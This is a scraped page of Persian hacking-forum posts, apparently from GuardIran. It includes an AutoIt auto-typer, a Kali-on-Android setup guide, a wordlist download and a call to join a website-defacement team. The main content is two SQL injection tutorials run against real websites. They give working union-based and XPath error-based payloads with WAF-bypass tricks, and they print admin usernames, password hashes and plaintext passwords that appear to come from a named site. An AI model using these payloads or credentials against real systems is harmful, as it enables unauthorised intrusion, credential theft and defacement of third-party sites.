GUICtrlSetFont(-1, 15, 800, 0, "MS Sans Serif") GUICtrlSetColor(-1, 0xFF0000) GUICtrlSetBkColor(-1, 0xA6CAF0) GUISetState(@SW_SHOW) در کنار متغییر ها پسوند Global قرار دادم تا در تمام برنامه قابل استفاده باشند متغییر های Botton که مشاهده میکنید کلیدهای برنامه هستند یک کلید Save قرار دادم و یک کلید Stop شما بعد از وارد کردم حروفتون درون تکستی که قرار دادم باید کلید Save رو بزنید سپس هر مکان قابل تایپی کلیک کنید برنامه شروع به تایپ خواهد کرد While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button1 $dataGetfromUser = GUICtrlRead($Edit1) while True Send($dataGetfromUser) Send("{ENTER}") WEnd Case $Button2 Exit EndSwitch WEnd حلقه ای را تشکیل دادم که وظایف رو مرتب تکرار کنه و به وسیله ی این متغییر ورودی شما رو ذخیره کردم تا ازش استفاده بشه بدین صورت با حلقه ای که وارد کردم برنامه تایپ رو به صورت هرمی از کوچک به بزرگ انجام میدهد👽 $dataGetfromUser = GUICtrlRead($Edit1) امیدوارم لذت ببرید با تشکر 💓 پسورد فایل ================================>>>>guardiran.org Mr_Zero.rar
-
nonamee
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : [Hidden Content] با قرار دادن ' آسیب پذیری مشخص خواهد شد [Hidden Content]' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور [Hidden Content] order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group [Hidden Content] group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم [Hidden Content]' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت [Hidden Content]' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل [Hidden Content]' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
- 2 پاسخ
-
- sqlinjectin bypass
- دیفیس
- (و 17 مورد دیگر)
-
سلام👋 اینجا میخواهم به شما آموزش نصب کالی لینوکس در اندروید را بدهم پس گوشیتون را آماده کنید! من دو روش نصب با روت و بدون روت به شما آموزش خواهم داد. نکته: با روت کردن گوشی از خدمات گوگل پلی محروم خواهید شد به همین دلیل لینک دانلود نرم افزار ها از مایکت تهیه شده است. با روت: ابتدا شما باید نرم افزار ترموکس(دانلود از مایکت) دانلود و نصب کنید. سپس نرم افزار Anlinux(دانلود از مایکت) را دانلود و نصب کنید. نرم افزار anlinux را باز کنید و گزینه dashboard را انتخاب کنید، کاربرد و راه استفاده صحیح از گزینه های دیگر را بعد از نصب کالی لینوکس به شما توضیح خواهم داد. گزینه اول choose را انتخاب کنید(برای شما چندین سیستم عامل می آید که شما kali را انتخاب کنید)، سپس روی copy برای کپی دستورات نصب، کلیک کنید، سپس روی launch کلیک کنید. اگر نرم افزار ترموکس را نصب کرده باشید برای شما نرم افزار ترموکس باز خواهد شد سپس انگشت مبارکتان را روی صفحه نگه دارید تا گزینه paste برای شما ظاهر شود، روی آن کلیک کنید و enter را بزنید. بستگی به سرعت اینترنت شما دارد که چقدر طول بکشد.حجم آن تقریبا ۷۱ مگابایت است. پس از اتمام نصب با دستور زیر آن را اجرا کنید: ./start-kali.sh اگر برای شما root@localhost#~$ ظاهر شد تبریک میگویم کالی لینوکس ورژن 2020.3 با موفقیت برای شما نصب شده است. حالا...میرسیم به آن گزینه هایی که برای ما هنگام باز کردن نرم افزار anlinux ظاهر شدند. توجه! توجه! توجه!: برای اجرای صحیح این دستورات باید حتما سیستم عامل کالی را فعال کنید سپس در سیستم عامل کالی آن ها را اجرا کنید. خب، اگر دقت کنید سیستم عامل ما رابط گرافیکی ندارد، و برای اجرای نرم افزار هایی همچون Firefox به مشکل بر خواهید خورد. پس ما از یکی از آن گزینه ها به اسم Desktop environment را انتخاب میکنیم، سپس روی گزینه CHOOSE (اولی) کلیک میکنیم و سیستم عامل kali را انتخاب میکنیم در گزینه CHOOSE (دومی) شما حق انتخاب دارید اگر رابط گرافیکی زیبایی میخواهید MATE را انتخاب کنید یا اگر حافظه گوشی شما کم است گزینه Xfce4 را انتخاب کنید، سپس COPY را انتخاب کنید و روی LAUNCH کلیک کنید. یادآوری: سیستم عامل کالی را فعال کنید سپس دستور مورد نظر را اجرا کنید. توجه کنید که در حین نصب از شما یک رمز میخواهد. پس از نصب رابط گرافیکی بدون ارور و کامل شما باید نرم افزار Vnc viewer( دانلود از مایکت) را نصب کنید، سپس ان را اجرا کنید بعد از اجرا، یک کانکشن جدید درست کنید و روی 127.0.0.1:5901 تنظیم کنید سپس کانکت کنید و آن رمزی که از شما خواست را به آن بدهید. شما الان در محیط کاری لینوکس هستید!! توجه کنید که اگر ترموکس را به طور کامل ببندید دیگر نخواهید بود با vnc viewer متصل شوید پس کالی لینوکس را فعال کنید و دو دستور زیر را در آن به ترتیب اجرا کنید: vncserver-stop vncserver-start بدون روت: برای نصب کالی لینوکس بدون روت با پایداری بالا در اندروید شما باید نرم افزار userland(دانلود از مایکت) را نصب کنید سپس نرم افزار userland را باز کنید و منتظر باشید سیستم عامل های قابل نصب برای شما لود شود. بعد هم روی سیستم عامل Kali کلیک کنید،یک نام کاربری و رمز عبور انتخاب کنید و روی ادامه کلیک کنید، منتظر دانلود کامل و آماده سازی فایل ها بمانید. اگر نرم افزار vnc viewer را نصب کرده باشید وارد آن میشوید و رمزی که انتخاب کردید را وارد میکنید و از کالی لینوکس لذت ببرید. برای شما تمامی لینک های دانلود نرم افزار ها از مایکت را قرار داده ام. امیدوارم که لذت برده باشید، لایک فراموش نشه، موفق و پیروز باشید. untitled.txt
- 1 پاسخ
-
- کالی
- کالی ۲۰۲۰
-
(و 28 مورد دیگر)
برچسب زده شده با :
- کالی
- کالی ۲۰۲۰
- اندروید
- روت
- بدون روت
- هک
- امنیت
- کرک
- نصب کالی در اندروید
- نصب کالی لینوکس در اندروید
- نصب لینوکس در اندروید
- هک با گوشی
- هک با اندروید
- ترموکس
- یوزرلند
- انلینوکس
- kali
- kali 2020
- android
- root
- hack
- security
- crack
- install kali in android
- install kali linux in android
- hack with android
- hack with phone
- userland
- termux
- anlinux
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران تارگت اول برای آموزش -> شما برای پی بردن به وجود باگ SQL از چندین روش میتونید استفاده کنید روش اول بعد از عدد یا حرف میتونید هر یک از این علامت هارو قرار بدین ' یا '' یا \ بعد از قرار دادن هر یک از این علامت ها اگر هر گونه تغییر در سایت شدین احتمال زیاد سایت حاوی باگ هستش حالا عملیات برای سایت های مختلف فرق خواهد کرد که با چه زبانی نوشته شده ما فرض میکنیم با php نوشته شده برای پیدا کردن تارگت شما باید دورک نویسی را بلد باشید , اگر دورک نویسی بلد نباشید احتمال زیاد از تارگت هم خبری نیست من لیستی از دورک هارو واستون قرار میدم DORK.txtهر یک از دورک هارو در گوگل search کنید یادتون باشه اول دورک :inurl قرار بدید باگ SQLinjection نکات زیادی داره که سعی میکنم همه ی نکات را تقریبا خدمتتون عرض کنم ولی فعلا شما باید با نحوه ی کار آشنا بشید خب بریم سراغ تارگت اول [Hidden Content] شما بعد از قرار دادن ' متوجه خواهید شد که سایت حاوی باگ است به همین ترتیب شما میتونید خیلی راحت version و تعداد ستون های سایت رو دربیارید [Hidden Content] order by 99999-- 99999 که مشاهده میکنید یک عدد بزرگ هستش که شما به دلخواه میتونید وارد کنید این بدان معناست که ما با سایت صحبت میکنیم که آیا انقدر تعداد ستون دارد یا خیر ؟ اگر بعد از قرار دادن این عدد بزرگ سایت به طور کامل load شد این بدان معناست که سایت در گفتن حرف صحیح دریغ میکند 😁 پس باید بایپس آن را انجام دهیم بایپس این مورد به این شکل هستش [Hidden Content] order by 99999--+ در این حالت سایت دیگر load نمی شود چون دیگر اینقدر ستون ندارد ما تا جایی عدد 9999 را کم میکنیم که تا صفحه load شود که این بدان معناست تعداد ستون ها 5 عدد است [Hidden Content] order by 5--+ حال با دستور UNION SELECT 1,2,3,4,5 ستون هارو مشخص میکنیم [Hidden Content] union select 1,2,3,4,5--+ بعد از انجام مراحل بالا ستون ها مشخص میشود در صفحه عدد 2 و 3 مشخص شده است ما باید سعی کنیم عددی را انتخاب کنیم که از لحاظ سایز زیادی بزرگ نباشد برای مثال در اینجا عدد 2 دارای سایز بزرگتری نسبت به 3 هستش پس ما شروع به سوال پرسیدن از عدد 3 خواهیم کرد حال سوال پیش میاید چرا 2 را انتخاب نکنیم ؟ چون در استخراج اطلاعات مهم سایت مثلا user va pass به صورت حروف بزرگ نمایش داده میشود که ممکن است این حروف به صورت کوچک وارد سیستم شده اند برای فهمیدن version سایت کافی است شما ()version را به جای عدد 3 قرار دهید این نکته هم خدمتتون عرض کنم اگر جایی با گذاشتن ()version چیزی نمیایش داده نشد آن را بایپس کنید بدین صورت version@@ [Hidden Content] union select 1,2,version(),4,5--+ حال به سراغ بیرون کشید data base سایت خواهیم رفت بدین صورت با دستور [Hidden Content] union select 1,2,group_concat(table_name,0x3c62723e),4,5+from+information_schema.tables+where+table_schema=database()--+ اگر مشاهده کنید admin یک base مهم برای کار ماست آن را یاد داشت میکنیم و به صورت hex شده هم در میاوریم اگر نمیدونید چطور به صورت hex دربیارید چون باید به زبان سایت admin را تبدیل کنید یک برنامه قرار میدم برای راحتی کارتون CharConversion.rarپسورد ---> guardiran.org admin = 0x61646d696e اینو یادتون باشه حتما قبل 61646d696e ---> 0x قرار دهید دستور بدین صورت است [Hidden Content]%20union%20select%201,2,group_concat(column_name,0x3c62723e),4,5+from+information_schema.columns+where+table_name=0x61646d696e--+ بعد از مشخص شدن table های مهم آن ها را در دستور زیر وارد کنید group_concat(user,0x3a,password)+from+ Hex kardim [Hidden Content]%20union%20select%201,2,group_concat(user_id,0x3a,password,0x3c62723e),4,5+from+admin--+ به همین راحتی username : admin password : 25a41cec631264f04815eda23dc6edd9 password : vizag@123 سعی کردم تارگتی رو انتخاب کنم که به راحتی بتونید یاد بگیرید دستورات رو نکته : دستوری رو میتونم یادتون بدم که در خیلی موارد جواب میده و اصلا نیاز نیست زمان زیادی برای پیدا کردن database یا table صرف کنید شما فقط کافی در قسمت ستون آسیب پذیر این دستور رو وارد کنید (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a) به همین راحتی تمام جزئیات مشخص خواهد شد تارگت شماره ی 2 ----------> [Hidden Content] شما خیلی راحت میتونید با دورک نویسی صفحه ای رو پیدا کنید برای وارد کرد دستورات مثلا در گوگل بدین صورت search میکنید site:"[Hidden Content]" inurl:"id=" [Hidden Content]/our-products-detail.php?id=1 فرضا این صفحه رو انتخاب کردیم و دستورات را وارد میکنیم با وارد کردن ' متوجه میشیم که سایت دارای تغییر است و Error میدهد پس سایت باگ SQLinjection دارد حال دستورات را وارد میکنیم [Hidden Content]/our-products-detail.php?id=1 order by 999999-- بعد از آن فهمیدیم که تعداد ستون های سایت 7 تا است بدین طریق عمل میکنیم [Hidden Content]/our-products-detail.php?id=1%20union%20select%201,2,3,4,5,6,7-- ولی بعد از وارد کردن این دستورات یک Error معروف به میدهد The used SELECT statements have a different number of columns زمانی که با این Error مواجع شدید باید از بایپس استفاده کنید اگر بایپس هم جوابگو نداد باید از متد Xpath injection استفاده کنید متد xpath injection برای به دست آوردن version در این متد شما باید بدین طریق عمل کنید با این دستور +and+extractvalue(rand(),concat(0x7e,version()))-- or +and+updatexml(null,concat(0x3a,version()),null)-- بعد از وارد کردن [Hidden Content]/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,version()))-- version مشخص میشود XPATH syntax error: '~5.5.62-38.14-log' به همین راحتی حالا باتوجه به دستورات xpath injection برای به دست آوردن data base سایت عمل میکنیم بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))-- که با زیاد کردن عدد 0 میتونید database رامشخص کنید ولی برای راحتی کار شما یک متد محدود سازی شده قرار میدم که میتونید استفاده کنید که زمانتون از دست نره بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- حال دستورات را وارد کنید بدین طریق [Hidden Content]/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- مشاهده میکنید که با خوش شانسی اول admin پدیدار میشود بسیار خب حال برای فهمیدن چه چیزی درون ادمین است از این روش استفاده میکنیم فقط قبلش باید admin رو به صورت hex شده دربیارید admin = 0x61646d696e +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=name table hex masalan admin+limit+0,1)))-- بسیار خب حالا دستور بالا را وارد میکنیم www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1)))-- بسیار خب حالا عدد صفر را به ترتیب زیاد کنید مشاهده میکنید که XPATH syntax error: '~id' XPATH syntax error: '~login' XPATH syntax error: '~paswoord' نمایش داده میشود انقدر عدد را افزایش میدید که دیگر چیزی نمایش داده نشود حالا با دستور زیاد اطلاعات رو بیرون میکشیم +and+extractvalue(rand(),concat(0x7e,(select+concat(login,0x7e,paswoord)+from+admin+limit+0,1)))-- XPATH syntax error: '~belbana~3AMGz4dfNRUteaZfbeng' سعی میکنم در روز های آینده تارگت و آموزش رو باهم قرار بدم همراه با بایپس های خاص امیدوارم موفید واقع شده باشه با تشکر
- 1 پاسخ
-
- آموزش sqlinje
- sqlinjectin bypass
- (و 13 مورد دیگر)
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت دوستان عزیز تیم انجمن گاردایران در این تاپیک چند نمونه پسوردلیست واستون آماده کردم که در زمینه ی کرک بسیار مهم و رایج هستند پسورد ------------------>>>>>>>>>>> guardiran.org Wordlists&Password.rar
-
- password
- passwordlist
-
(و 13 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @Dr.Kali 4- @HCSH4C39 5- @mmj-sys 6- @KR0N0S 7- @SHIWPTS13 8- @Scary مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
- 6 پاسخ
-
- python programming
- php
- (و 16 مورد دیگر)